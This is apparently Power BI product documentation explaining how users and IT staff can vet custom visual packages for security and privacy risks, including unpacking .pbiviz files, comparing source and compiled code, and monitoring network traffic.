Review custom visuals for security and privacy
Before you enable a custom visual, you should review that visual for security and privacy to make sure if will fit your organization's standards.
Enable a custom visual
Considerations before you enable a custom visual
A custom visual could contain code with security or privacy risks; therefore, a custom visual in the report is disabled until you choose Enable custom visuals. Here are some considerations to decide whether to enable a custom visual:
- Ensure you trust the author and the source of the custom visuals used in the report
- If you are unsure what to do, you should reach out to your IT team to weigh in on whether you should enable custom visuals for reports you view.
- If someone shares a report with you that contains a custom visual, even if they're a close co-worker, do not feel obligated to enable the custom visual. It's okay to step back and consider whether it is essential to the task at hand. It's always okay to ask someone to provide you a report without custom visuals if you don't feel confident about the custom visual.
Security best practices for IT Professionals to enable a custom visual
A custom visual could contain code with security or privacy risks; therefore, a custom visual in the report is disabled until you choose Enable custom visuals. There are several best practices you can follow to evaluate a custom visual for security and privacy.
- Implement a vetting process for custom visuals within the organization. Vetted custom visuals would be shared with internal users through an internal website, such as a SharePoint document library or OneNote document.
- Provide guidance for business users on appropriate use of custom visuals and an email group for business users to send security and privacy questions to.
- Save the .pbiviz file to a folder.
- Rename the file to a .zip file.
- Extract the zip file to a local folder.
Custom visual file contents
The following are the contents of a pbiviz file:
|./package.json||A manifest file that indicates which files to load for the custom visual.|
|./resources/<name>||<name> is the name of the custom visual.|
|./resources/<name>.css||The css resource file for the custom visual.|
|./resources/<name>.png||The icon shown to the user for the visual.|
After you extract the pbiviz file, you can evaluate the code. Here are some best practices and threats to look for.
- Always evaluate the .js file contents. This is the code that actually runs. It could be that the contents of the .ts file don't compile to the .js file included in the custom visual.
- Always evaluate the .ts file contents. You can load the .ts file into the Developer Tools, export the visual and compare the resulting .js file in the newly create .pbiviz file to the original .js file contained in the visual
- Check that the icon for the custom visual does not resemble too closely other visuals the user is familiar with.
- Always evaluate the visual in a test account that has minimal privileges and does not have access to any sensitive data. Ideally the test account would be a local account with no sign-in information to services other than Power BI.
- Check network activity when the visual is being used in both edit and view mode. Ensure you're satisfied with the requests that are being made. You should not see requests to resources outside the Power BI domain unless the visual author has communicated this ahead of time.
- Any data you see leaving the Power BI domain should match your expectations for what 'normal' use would be. For example - if the visual implements a video player that uses an iFrame to view a video from another site, some information should travel in the IFrame requests to render the video correctly. However, if you see the entire data set being sent across the wire, you might investigate further if this is required and desired.
- Check if personally identifiable data is being sent or stored by the custom visual.
- Check if the custom visual is trying to access local machine resources such as writing files to disk or accessing cookies.
- Check if the custom visual has what appears to be obfuscated code or code without a clear purpose.
- Save copies of each visual you reviewed in the past.
- If you are reviewing an update to a visual you previously reviewed, ensure to check for changes. Always apply equal rigor to updates as you did the first time you received the visual for review
- If you find something suspicious or unclear, please reach out to us we're here to help.
Visualizations in Power BI
Custom Visualizations in Power BI
Publish custom visuals to the Office store
Getting started with custom visuals developer tools
How to certify a custom visual
Video: Creating custom visualizations for Power BI with Sachin Patney and Nico Cristache
More questions? Try asking the Power BI Community